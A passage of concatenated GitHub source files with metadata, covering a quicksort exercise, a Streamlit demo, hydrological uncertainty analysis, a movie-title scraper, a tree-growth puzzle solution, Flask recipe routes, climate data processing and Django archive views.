** 6)\ninput = sys.stdin.readline\n\n\ndef quickSort(left, right):\n if left >= right:\n return\n l = left\n r = right\n mid = arr[(l + r) // 2]\n while True:\n while arr[l] < mid:\n l += 1\n while arr[r] > mid:\n r -= 1\n if l >= r:\n break\n temp = arr[l]\n arr[l] = arr[r]\n arr[r] = temp\n quickSort(left, l - 1)\n quickSort(r + 1, right)\n\n\nn = int(input().strip())\narr = list()\nfor i in range(n):\n arr.append(int(input().strip()))\nquickSort(0, n - 1)\nprint('\\n'.join(str(x) for x in arr))","repo_name":"huisam/JinLearnedList","sub_path":"Algorithm/baekjoon/python/2751_수정렬하기2.py","file_name":"2751_수정렬하기2.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"36985074433","text":"import streamlit as st\nfrom PIL import Image\n\nst.title(\"miau de pablitus03\")\n\nst.header (\"aqui comienza mi historia\")\nst.write (\"confio en que puuedo entender\")\nimage = Image.open('nyan_cat.jpg')\n\nst.image(image, caption= 'interfaces')\n\ntexto =st.text_input('eres libre de escribir','mia mie mii mio miu')\nst.write( 'el texto es', texto)\n\nst.subheader (\"xX .......... vienen 2 columnas .......... Xx\")\n\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.subheader (\"soy la primera\")\n st.write(\"si soy la primera\")\n resp = st.checkbox ('de acuerdo')\n if resp:\n st.write('sip')\n\nwith col2:\n st.subheader (\"this is the remix\")\n modo = st.radio (\"tu interfaz es\", ('visual','auditiva','touch'))\n if modo == 'visual':\n st.write (\" menos mal, ya me preocuparia si escribieras sin ver\")\n \n if modo == 'auditiva':\n st.write (\"tenemos orejas que alegria\")\n \n if modo == 'touch':\n st.write (\" ve a abrasar un arbol, llevas mucho aqui sentado\")\n\nst.subheader (\"NOOOOO,MIS BOTONES DE GOMITA\")\nif st.button ('press start'):\n st.write ('player n1, ready')\n\nelse:\n st.write ('exit?')\n\nst.subheader(\"hoy quiero...\")\nin_mod = st.selectbox(\n \" que llevas el dia de hoy\",\n (\"pizza\",\"anvorguesa\",\"niños con queso y tocineta\"),\n)\n\nif in_mod == \"pizza\":\n set_mod = \"en la michi pizzeria todo se amaza a patita\"\n\nelif in_mod == \"anvorguesa\":\n set_mod = \" para pa pa paaaaa\"\n\nelif in_mod == \"niños con queso y tocineta\":\n set_mod = \"sale un niño especialllll\"\n\nst.write (\" 3, 2, 1\", set_mod)\n\nwith st.sidebar:\n st.subheader (\"configuara el termino\")\n mod_radio = st.radio(\n \"escoge tu color\",\n ('rosadito', 'cafe','mejor pide un carbon')\n )\n","repo_name":"pablitus03/clase-introduccion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"89018452","text":"import warnings\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nfrom utility import print_progress_bar\r\nfrom utility import nash, nancorr, pbias\r\nfrom configobj import ConfigObj\r\n\r\nwarnings.filterwarnings('ignore')\r\nprint('/014')\r\n\r\n\r\ndef get_configuration(is_grazing, field):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n file_config = f'../{field}/{scenario}/pyAPEX/runtime.ini'\r\n config = ConfigObj(file_config)\r\n return config\r\n\r\n\r\ndef get_measure(data_dir, file_name):\r\n file_name = os.path.join(data_dir, file_name)\r\n df_data = pd.read_csv(file_name)\r\n date_vec = []\r\n ndata = df_data.shape[0]\r\n for i in range(ndata):\r\n date_vec.append(pd.to_datetime(f'{df_data.Year[i]}-{df_data.Month[i]}-{df_data.Day[i]}'))\r\n df_data.Date = date_vec\r\n df_data.index = df_data.Date\r\n df_data = df_data[['Date', 'Year', 'Month', 'Day', 'runoff (mm)', 'sediment (kg)']]\r\n df_data.columns = ['Date', 'Year', 'Month', 'Day', 'runoff', 'sediment']\r\n return df_data\r\n\r\n\r\ndef partition_data(df_obs, obs_attribute, df_mod, mod_attribute, years_warm_up=4, cal_year=11):\r\n try:\r\n year_start = df_mod.Y[0]\r\n cal_start = year_start + years_warm_up\r\n cal_end = cal_start + cal_year\r\n val_end = df_obs.Year[-1]\r\n df_obs_cal = df_obs[(df_obs.Year >= cal_start) & (df_obs.Year <= cal_end)]\r\n df_obs_val = df_obs[(df_obs.Year > cal_end) & (df_obs.Year <= val_end)]\r\n df_model_cal_data = df_mod[(df_mod.Y >= cal_start) & (df_mod.Y <= cal_end)]\r\n df_model_val_data = df_mod[(df_mod.Y > cal_end) & (df_mod.Y <= val_end)]\r\n df_cal = pd.concat([df_obs_cal[obs_attribute], df_model_cal_data[mod_attribute]], axis=1)\r\n df_cal.columns = ['Observed', 'Modeled']\r\n df_val = pd.concat([df_obs_val[obs_attribute], df_model_val_data[mod_attribute]], axis=1)\r\n df_val.columns = ['Observed', 'Modeled']\r\n except Exception as e:\r\n print(e)\r\n print('File is empty')\r\n return np.nan, np.nan\r\n return df_cal, df_val\r\n\r\n\r\ndef get_file_name(run_id, is_grazing, field, location):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n file_loc = f'../{field}/{scenario}/pyAPEX/OutputUncertainty/'\r\n if (location == 'basin') | (location == 'outlet'):\r\n file_read = f'daily_{location}_{run_id:07}.csv.csv'\r\n else:\r\n file_read = f'{location}_{run_id:07}.csv'\r\n return file_loc + file_read\r\n\r\n\r\ndef read_model_output(file, attribute):\r\n data_read = pd.read_csv(file)\r\n df = data_read[['Date', 'Y', 'M', 'D', attribute]]\r\n df.index = df.Date\r\n df = df.drop('Date', axis=1)\r\n df.index = pd.to_datetime(df.index)\r\n return df\r\n\r\n\r\ndef read_measured(field, is_grazing, file):\r\n if is_grazing:\r\n scenario = 'pyAPEX_g'\r\n else:\r\n scenario = 'pyAPEX_n'\r\n obs_path = f'../{field}/{scenario}/pyAPEX/Program/'\r\n df = get_measure(obs_path, file)\r\n df = df.drop('Date', axis=1)\r\n df.index = pd.to_datetime(df.index)\r\n return df\r\n\r\n\r\ndef get_glue(field, is_grazing):\r\n # configuration data\r\n config = get_configuration(is_grazing=is_grazing, field=field)\r\n file_observe = config['file_observe']\r\n max_un, step = int(config['max_range_uncertaintity']), float(config['increment_uncertainty'])\r\n range_vec = np.arange(-max_un, max_un + step, step)\r\n n_sim = len(range_vec)\r\n # read measured data\r\n df_obs = read_measured(field=field, is_grazing=is_grazing, file=file_observe)\r\n MSE_vec = []\r\n NSE_vec = []\r\n COD_vec = []\r\n PBIAS_vec = []\r\n range_set = []\r\n likelihood_mse_year_mat = pd.DataFrame()\r\n likelihood_nse_year_mat = pd.DataFrame()\r\n likelihood_cod_year_mat = pd.DataFrame()\r\n likelihood_pbias_year_mat = pd.DataFrame()\r\n mse_year_mat = pd.DataFrame()\r\n cod_year_mat = pd.DataFrame()\r\n nse_year_mat = pd.DataFrame()\r\n pbias_year_mat = pd.DataFrame()\r\n # for run in range(4119, 4123):\r\n print_progress_bar(0, n_sim, prefix='', suffix='', decimals=1, length=100, fill='█')\r\n for run in range(n_sim):\r\n # read model output\r\n file_path = get_file_name(run_id=run + 1, is_grazing=is_grazing, field=field, location='outlet')\r\n df_mod = read_model_output(file=file_path, attribute='WYLD')\r\n # merge and separate measurement and simulated data\r\n df_cal, df_val = partition_data(df_obs, obs_attribute='runoff', df_mod=df_mod, mod_attribute='WYLD',\r\n years_warm_up=4,\r\n cal_year=11)\r\n try:\r\n df_val = df_val.dropna()\r\n df_data = pd.concat([df_cal, df_val], axis=0)\r\n df_data.insert(0, 'Year', df_data.index.year)\r\n\r\n # calculate yearly MSE\r\n year_vec = df_data.Year.unique()\r\n mse_vec_year = []\r\n nse_vec_year = []\r\n cod_vec_year = []\r\n pbias_vec_year = []\r\n for year in year_vec:\r\n data_year = df_data[df_data.Year == year]\r\n X, Y = data_year.Observed.values, data_year.Modeled.values\r\n MSE = np.sum((X - Y) ** 2) / len(X)\r\n mse_vec_year.append(MSE)\r\n nse_vec_year.append(nash(X, Y))\r\n cod_vec_year.append(nancorr(X, Y))\r\n pbias_vec_year.append(np.abs(pbias(X, Y)))\r\n del MSE, X, Y\r\n # calculating annual likelihood\r\n L_theta_mse_vec_year = []\r\n L_theta_nse_vec_year = []\r\n L_theta_cod_vec_year = []\r\n L_theta_pbias_vec_year = []\r\n for j in range(len(year_vec)):\r\n L_theta_mse_vec_year.append(np.exp(-mse_vec_year[j] / np.min(mse_vec_year)))\r\n L_theta_nse_vec_year.append(np.exp(-nse_vec_year[j] / np.max(nse_vec_year)))\r\n L_theta_pbias_vec_year.append(np.exp(-cod_vec_year[j] / np.max(cod_vec_year)))\r\n L_theta_cod_vec_year.append(np.exp(-pbias_vec_year[j] / np.min(pbias_vec_year)))\r\n df_mse = pd.DataFrame(mse_vec_year, index=year_vec)\r\n df_nse = pd.DataFrame(nse_vec_year, index=year_vec)\r\n df_cod = pd.DataFrame(cod_vec_year, index=year_vec)\r\n df_pbias = pd.DataFrame(pbias_vec_year, index=year_vec)\r\n df_mse.columns, df_nse.columns = [str(run + 1)], [str(run + 1)]\r\n df_cod.columns, df_pbias.columns = [str(run + 1)], [str(run + 1)]\r\n mse_year_mat = pd.concat([mse_year_mat, df_mse], axis=1)\r\n nse_year_mat = pd.concat([nse_year_mat, df_nse], axis=1)\r\n cod_year_mat = pd.concat([cod_year_mat, df_cod], axis=1)\r\n pbias_year_mat = pd.concat([pbias_year_mat, df_pbias], axis=1)\r\n df_Likelihood_mse = pd.DataFrame(L_theta_mse_vec_year, index=year_vec)\r\n df_Likelihood_nse = pd.DataFrame(L_theta_nse_vec_year, index=year_vec)\r\n df_Likelihood_cod = pd.DataFrame(L_theta_cod_vec_year, index=year_vec)\r\n df_Likelihood_pbias = pd.DataFrame(L_theta_pbias_vec_year, index=year_vec)\r\n df_Likelihood_mse.columns, df_Likelihood_nse.columns = [str(run + 1)], [str(run + 1)]\r\n df_Likelihood_cod.columns, df_Likelihood_mse.columns = [str(run + 1)], [str(run + 1)]\r\n likelihood_mse_year_mat = pd.concat([likelihood_mse_year_mat, df_Likelihood_mse], axis=1)\r\n likelihood_nse_year_mat = pd.concat([likelihood_nse_year_mat, df_Likelihood_nse], axis=1)\r\n likelihood_cod_year_mat = pd.concat([likelihood_cod_year_mat, df_Likelihood_cod], axis=1)\r\n likelihood_pbias_year_mat = pd.concat([likelihood_pbias_year_mat, df_Likelihood_pbias], axis=1)\r\n # calculate MSE over the simulation period\r\n X, Y = df_data.Observed.values, df_data.Modeled.values\r\n MSE_vec.append(np.sum((X - Y) ** 2) / len(X))\r\n NSE_vec.append(nash(X, Y))\r\n COD_vec.append(nancorr(X, Y))\r\n PBIAS_vec.append(np.abs(pbias(X, Y)))\r\n range_set.append(range_vec[run])\r\n # print(processing {run + 1}')\r\n print_progress_bar(run, n_sim, prefix=f'{run+1}', suffix='', decimals=1, length=100, fill='█')\r\n except Exception as e:\r\n print(e)\r\n continue\r\n\r\n if is_grazing:\r\n idx = 'g'\r\n else:\r\n idx = 'n'\r\n mse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_mse.csv')\r\n nse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_nse.csv')\r\n cod_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_cod.csv')\r\n pbias_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_pbias.csv')\r\n likelihood_mse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_mse.csv')\r\n likelihood_nse_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_nse.csv')\r\n likelihood_cod_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_cod.csv')\r\n likelihood_pbias_year_mat.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_annual_likelihood_pbias.csv')\r\n L_mse_Vec = []\r\n L_nse_Vec = []\r\n L_cod_Vec = []\r\n L_pbias_Vec = []\r\n for i in range(len(MSE_vec)):\r\n L_mse_Vec.append(np.exp(-MSE_vec[i] / np.nanmin(MSE_vec)))\r\n L_nse_Vec.append(np.exp(-NSE_vec[i] / np.nanmax(NSE_vec)))\r\n L_cod_Vec.append(np.exp(-COD_vec[i] / np.nanmax(COD_vec)))\r\n L_pbias_Vec.append(np.exp(-PBIAS_vec[i] / np.nanmin(PBIAS_vec)))\r\n df_out = pd.DataFrame({'Percent': range_set, 'MSE': MSE_vec, 'Likelihood_MSE': L_mse_Vec, 'NSE': NSE_vec,\r\n 'Likelihood_NSE': L_nse_Vec, 'COD': COD_vec,\r\n 'Likelihood_COD': L_cod_Vec, 'PBIAS': PBIAS_vec, 'Likelihood_PBIAS': L_pbias_Vec})\r\n df_out.to_csv(f'../post_analysis/Results/{field}_{idx}_Uncertainty_range.csv')\r\n\r\n\r\nget_glue(field='Farm_1', is_grazing=False)\r\nget_glue(field='Farm_1', is_grazing=True)\r\nget_glue(field='Farm_8', is_grazing=False)\r\nget_glue(field='Farm_8', is_grazing=True)\r\n","repo_name":"mlmaskey/pyAPEXSCU","sub_path":"post_scripts/summarize.uncertainty.loglikelihood.py","file_name":"summarize.uncertainty.loglikelihood.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"33569541083","text":"\"\"\"\n 作者:倪媛\n 功能:抓取TOP250电影数据\n 日期:22/10/2018\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef main():\n \"\"\"\n 主函数\n \"\"\"\n for i in range(10):\n # 将url的start=部分循环加25来实现网页的变化\n url = 'https://movie.douban.com/top250?start=' + str(25*i)\n # 建立连接\n r = requests.get(url, timeout=30)\n # 把HTML代码转化成soup对象\n soup = BeautifulSoup(r.text, 'lxml')\n # 找到标题行列表\n title_list = soup.find_all('div', {'class': 'hd'})\n # 循环每个元素找到具体的标题\n for title in title_list:\n # 只返回找到元素的第一个标签\n # title_name = title.a.span.text.strip()\n title_name = title.find('span', {'class': 'title'}).text.strip()\n print(title_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CeciliaNi/PythonScraping","sub_path":"lect03_movie_top250.py","file_name":"lect03_movie_top250.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"24201500413","text":"# 백준 - 나무 재테크\n\nimport sys, heapq\n\nN, M, K = map(int, sys.stdin.readline().split(' '))\n\nA = [[0 for _ in range(N + 1)] for _ in range(N + 1)] # 양분\nland = [[5 for _ in range(N + 1)] for _ in range(N + 1)] # 땅\ntrees = [[[] for _ in range(N + 1)] for _ in range(N + 1)] # 나무\n\nfor i in range(N):\n line = list(map(int, sys.stdin.readline().split(' ')))\n for j in range(N):\n A[i + 1][j + 1] = line[j]\n\nfor _ in range(M):\n x, y, z = map(int, sys.stdin.readline().split(' '))\n trees[x][y].append(z)\n\n\ndef spring_and_summer():\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n if trees[r][c]:\n\n trees[r][c].sort()\n dead = []\n alive = []\n for tree in trees[r][c]:\n\n if land[r][c] < tree:\n dead.append(tree)\n else:\n land[r][c] -= tree\n alive.append(tree+1)\n\n trees[r][c] = alive[:]\n for _tree in dead:\n land[r][c] += _tree // 2\n\n\ndef fall():\n dirs = ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n for tree in trees[r][c]:\n if tree % 5 == 0:\n for i, j in dirs:\n if 0 < r + i <= N and 0 < c + j <= N:\n trees[r + i][c + j].append(1)\n\n\ndef winter():\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n land[r][c] += A[r][c]\n\n\ndef count_tree():\n cnt = 0\n for r in range(1, N + 1):\n for c in range(1, N + 1):\n cnt += len(trees[r][c])\n return cnt\n\n\nfor _ in range(K):\n spring_and_summer()\n fall()\n winter()\n\nprint(count_tree())\n\n","repo_name":"superyodi/burning-algorithm","sub_path":"samsung/boj_16235.py","file_name":"boj_16235.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30095653563","text":"import json\nimport os.path\nimport codecs\n\n\nfrom sampledata.exceptions import ParameterError\n\nLOCALES = ['es', 'us']\nCITIES_PATH = os.path.join(os.path.dirname(__file__), 'cities')\n\n\nclass City(object):\n data = {}\n\n def __load_locale(self, locale):\n locale_path = os.path.join(CITIES_PATH, \"{0}.json\".format(locale))\n if not os.path.exists(locale_path):\n raise ParameterError('Not valid locale')\n\n fd = codecs.open(locale_path, 'r', encoding='utf-8')\n City.data[locale] = json.load(fd)\n fd.close()\n\n def get_cities(self, locale):\n if locale not in City.data:\n self.__load_locale(locale)\n\n return [x for x in City.data[locale]['cities']]\n\n def all_cities(self):\n cities = []\n for locale in LOCALES:\n cities += self.get_cities(locale)\n\n return cities\n\n def generate(self, sd, locale=None):\n if locale:\n cities = self.get_cities(locale)\n else:\n cities = self.all_cities()\n\n return sd.choice(cities)\n","repo_name":"jespino/sampledata","sub_path":"sampledata/l10n/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"4259917088","text":"import os\n\n\nOPTIONS = [\n 'Addition',\n 'Subtraction',\n 'Multiplication',\n 'Division',\n]\n\nFUNCTION = {\n 1: lambda a, b: a+b,\n 2: lambda a, b: a-b,\n 3: lambda a, b: a*b,\n 4: lambda a, b: a/b,\n}\n\n\ndef msg_error(msg, err=\"\"):\n print(msg, err)\n\n\nclass Calculator(object):\n\n def __init__(self):\n self.run()\n\n def run(self):\n\n while True:\n options = OPTIONS\n print(\"Calculator CLI\")\n for i in range(len(options)):\n print(i+1, \"-\", options[i])\n\n try:\n choice = int(input(\"Choice any option: \"))\n except ValueError:\n msg_error(\"[ERROR] Invalid Value\")\n\n if choice < 0 or choice > len(options):\n msg_error(\"[ERROR] Invalid option\")\n\n self.choice_option(choice)\n\n def choice_option(self, x):\n os.system(\"clear\")\n options = OPTIONS\n\n try:\n func = FUNCTION[x]\n except KeyError as error:\n msg_error(\"[ERROR] Invalid option -\", error)\n\n if x in FUNCTION:\n print(\"Selected Option - \", options[x-1])\n print(func(*self.value_number()))\n\n def value_number(self):\n try:\n a = float(input(\"Type first number: \"))\n b = float(input(\"Type second number: \"))\n except (ValueError, IndexError, KeyError) as error:\n msg_error(\"[ERROR]\", error)\n\n return a, b\n\n\nif __name__ == '__main__':\n calc = Calculator()\n","repo_name":"rca0/playground","sub_path":"python/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73064856104","text":"from flask import render_template, request, redirect, session, flash, jsonify\nfrom flask_app import app\nfrom flask_app.models import recipe\n\n# UPDATED ROUTES\n@app.route('/recipes')\ndef recipe_list_page():\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect ('/login')\n else:\n session.pop('name', None)\n session.pop('description', None)\n session.pop('instructions', None)\n session.pop('date_cooked', None)\n session.pop('under_30', None)\n session.pop('id', None)\n return render_template('recipe_list.html')\n\n@app.route('/recipe/list')\ndef recipe_list():\n print(\"in recipe/list\")\n recipe_list = recipe.Recipe.get_all()\n return jsonify(recipe_list)\n\n@app.route('/recipe/create', methods=[\"post\"])\ndef create_recipe():\n # print(\"rf<30\"+request.form['under_30'])\n recipe_id = recipe.Recipe.save(request.form)\n data = {\n 'date_cooked' : request.form['date_cooked'],\n 'description' : request.form['description'],\n 'first_name' : request.form['first_name'],\n 'instructions' : request.form['instructions'],\n 'name' : request.form['name'],\n 'under_30' : request.form['under_30'],\n 'user_id' : request.form['user_id'],\n 'id' : recipe_id\n }\n return jsonify(data)\n \n\n@app.route('/recipe/edit/')\ndef recipe_edit_page(recipe_id):\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect ('/login')\n else:\n session['recipe_id'] = recipe_id\n return render_template('recipe_edit.html')\n \n\n@app.route('/recipe/get/')\ndef get_one_recipe(recipe_id):\n print(\"in recipe/get\")\n recipe_dict = recipe.Recipe.get_one_by_id(recipe_id)\n return jsonify(recipe_dict)\n\n@app.route('/recipe/getSession')\ndef get_session_json():\n session_dict = {\n 'recipe_id' : session['recipe_id'],\n 'user_id' : session['user_id']\n }\n return jsonify(session_dict)\n\n\n@app.route('/recipe/update', methods=[\"post\"])\ndef update_recipe():\n print('entered update_recipe in python')\n results = recipe.Recipe.update(request.form)\n return jsonify(request.form)\n\n\n@app.route('/recipe/delete/')\ndef delete_recipe(recipe_id):\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect ('/login')\n else:\n result = recipe.Recipe.delete(recipe_id)\n return redirect('/recipes') # to avoid this redirect,\n # we could possibly have the delete link not point to \n # this route, but instead an 'onClick' in the JS that\n # removes the element by id# (i added that to the list of\n # recipes) and *then* fetches this route. Seems awfully\n # clunky and I wonder if there is a better way","repo_name":"tonyb650/recipes_ajax","sub_path":"flask_app/controllers/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"70677227944","text":"\"\"\"\nFilename: calc_monthly_climatology.py\nAuthor: Damien Irving, irving.damien@gmail.com\nDescription: Calculate the monthly climatology\n\n\"\"\"\n\n# Import general Python modules\n\nimport sys, os, pdb\nimport argparse\nimport xarray as xr\nimport cmdline_provenance as cmdprov\n\ncwd = os.getcwd()\nrepo_dir = '/'\nfor directory in cwd.split('/')[1:]:\n repo_dir = os.path.join(repo_dir, directory)\n if directory == 'ocean-analysis':\n break\n\n\n# Define functions\n\ndef main(inargs):\n \"\"\"Run the program.\"\"\"\n\n dset = xr.open_mfdataset(inargs.infiles)\n if inargs.time_bounds:\n start, end = inargs.time_bounds\n dset = dset.sel(time=slice(start, end))\n clim_dset = dset.groupby('time.month').mean('time', keep_attrs=True)\n \n if 'history' in dset.attrs:\n history = dset.attrs['history']\n log = cmdprov.new_log(infile_history={inargs.infiles[0]: history}, git_repo=repo_dir)\n else:\n log = cmdprov.new_log(git_repo=repo_dir)\n clim_dset.attrs['history'] = log\n\n clim_dset.to_netcdf(inargs.outfile)\n\n\nif __name__ == '__main__':\n\n extra_info =\"\"\" \nauthor:\n Damien Irving, irving.damien@gmail.com\n \n\"\"\"\n\n description='Calculate the monthly climatology'\n parser = argparse.ArgumentParser(description=description,\n epilog=extra_info, \n argument_default=argparse.SUPPRESS,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument(\"infiles\", type=str, nargs='*', help=\"Input files\")\n parser.add_argument(\"outfile\", type=str, help=\"Output file name\")\n\n parser.add_argument(\"--time_bounds\", type=str, nargs=2, default=None, metavar=('START_DATE', 'END_DATE'),\n help=\"Time period [default = entire]\")\n\n args = parser.parse_args() \n main(args)\n","repo_name":"DamienIrving/ocean-analysis","sub_path":"data_processing/calc_monthly_climatology.py","file_name":"calc_monthly_climatology.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"36"} +{"seq_id":"39844146472","text":"\"\"\"\nIguana (c) by Marc Ammon, Moritz Fickenscher, Lukas Fridolin,\nMichael Gunselmann, Katrin Raab, Christian Strate\n\nIguana is licensed under a\nCreative Commons Attribution-ShareAlike 4.0 International License.\n\nYou should have received a copy of the license along with this\nwork. If not, see .\n\"\"\"\nfrom django.views.generic.detail import DetailView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\n\nfrom itertools import chain\nfrom lib.custom_model import get_r_object_or_404\nfrom issue.models import Issue\nfrom project.models import Project\n\n# NOTE: ugettext_lazy \"is essential when calls to these functions are located in code\n# paths that are executed at module load time.\"\nfrom django.utils.translation import ugettext as _, ugettext_lazy as _l\n\n\nclass ArchivedIssuesView(LoginRequiredMixin, UserPassesTestMixin, DetailView):\n template_name = 'archive/archived_issues_view.html'\n context_object_name = 'project'\n items_per_page_sprints = 5\n items_per_page_nosprint = 5\n item_list = None\n item_list_nosprint = None\n breadcrumb = _l('Archive')\n\n def get(self, *args, **kwargs):\n proj = get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n self.item_list = proj.sprint.order_by('-seqnum')\n self.item_list_nosprint = Issue.objects.filter(project__name_short=self.kwargs.get('project'),\n archived=True, sprint=None)\n return super(ArchivedIssuesView, self).get(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ArchivedIssuesView, self).get_context_data(**kwargs)\n context['nbar'] = 'sprint'\n proj = get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n archived_issues_without_sprint = Issue.objects.filter(project__name_short=self.kwargs.get('project'),\n archived=True, sprint=None)\n context['archived_issues_without_sprint'] = archived_issues_without_sprint\n context['sprints_sorted'] = proj.sprint.order_by('-seqnum')\n # paginator sprints\n if self.item_list:\n paginator = Paginator(self.item_list, self.items_per_page_sprints)\n page = self.request.GET.get('page')\n if not page or not page.isdigit():\n items = paginator.page(1)\n else:\n try:\n items = self.getItemsUntilPage(paginator, page)\n except EmptyPage:\n items = self.getItemsUntilPage(paginator, paginator.num_pages)\n context['page_items'] = items\n # paginator issues without sprint\n if self.item_list_nosprint:\n paginator_nosprint = Paginator(self.item_list_nosprint, self.items_per_page_nosprint)\n page_nosprint = self.request.GET.get('page_nosprint')\n if not page_nosprint or not page_nosprint.isdigit():\n items_nosprint = paginator_nosprint.page(1)\n else:\n try:\n items_nosprint = self.getItemsUntilPage(paginator_nosprint, page_nosprint)\n except EmptyPage:\n items_nosprint = self.getItemsUntilPage(paginator_nosprint, paginator_nosprint.num_pages)\n context['page_items_nosprint'] = items_nosprint\n return context\n\n def get_object(self):\n return get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n\n def test_func(self):\n return get_r_object_or_404(self.request.user, Project,\n name_short=self.kwargs.get('project')).user_has_read_permissions(self.request.user)\n\n def getItemsUntilPage(self, paginator, pageNumber):\n # for more comments see ShowMoreMixin\n items = paginator.page(pageNumber)\n for i in reversed(range(1, int(pageNumber))):\n items.object_list = list(chain(paginator.page(i).object_list, items.object_list))\n return items\n","repo_name":"midas66/iguana","sub_path":"src/archive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}